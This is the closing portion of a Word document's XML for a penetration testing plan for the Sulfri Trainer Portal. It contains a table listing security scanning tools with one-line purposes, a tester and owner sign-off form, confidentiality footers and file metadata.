            <w:tcW w:type="dxa" w:w="45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Automated HTTP security header grading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Mozilla Observatory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Security Audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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CSP, HTTPS, and header analysis for all public pages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Nikto</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Web Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="45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Server misconfiguration and known vulnerability scan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git log + grep</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Secret Scanning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Scan GitHub repository history for leaked API keys or credentials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Wappalyzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F7F9FC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Technology fingerprinting to identify exposed framework/version info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Sign-Off &amp; Attestation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
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E3A5F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Instructions</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Complete this section upon conclusion of all test cases and remediation cycles. Both the tester and the system owner must sign before the portal is considered security-cleared for production use.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E3A5F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Penetration Tester</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Name: ___________________________________</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Organisation: ____________________________</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Date: ___________________________________</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Signature: ______________________________</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Overall Finding: [ ] Pass  [ ] Conditional  [ ] Fail</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1E3A5F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">System Owner</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Name: Mohd Sulfri Mohd Harris</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Platform: sulfri-portal.vercel.app</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Date: ___________________________________</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Signature: ______________________________</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorisation confirmed: [ ] Yes  [ ] No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Sulfri Trainer Portal — Penetration Testing Document v1.0 | Aligned to SRS v1.5 | CONFIDENTIAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">This document is for authorised security testing use only. Unauthorised reproduction or distribution is prohibited.</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888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Prepared for: Mohd Sulfri Mohd Harris | sulfri-portal.vercel.app</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">	Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">  Generated by Sulfri Portal PenTest Doc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1E3A5F" w:sz="4" w:space="1"/>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E3A5F"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t xml:space="preserve">Sulfri Trainer Portal — Penetration Testing Document</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:type="dxa" w:w="308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CONFIDENTIAL | v1.5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2026-03-10T07:49:23.732Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-10T07:49:23.733Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>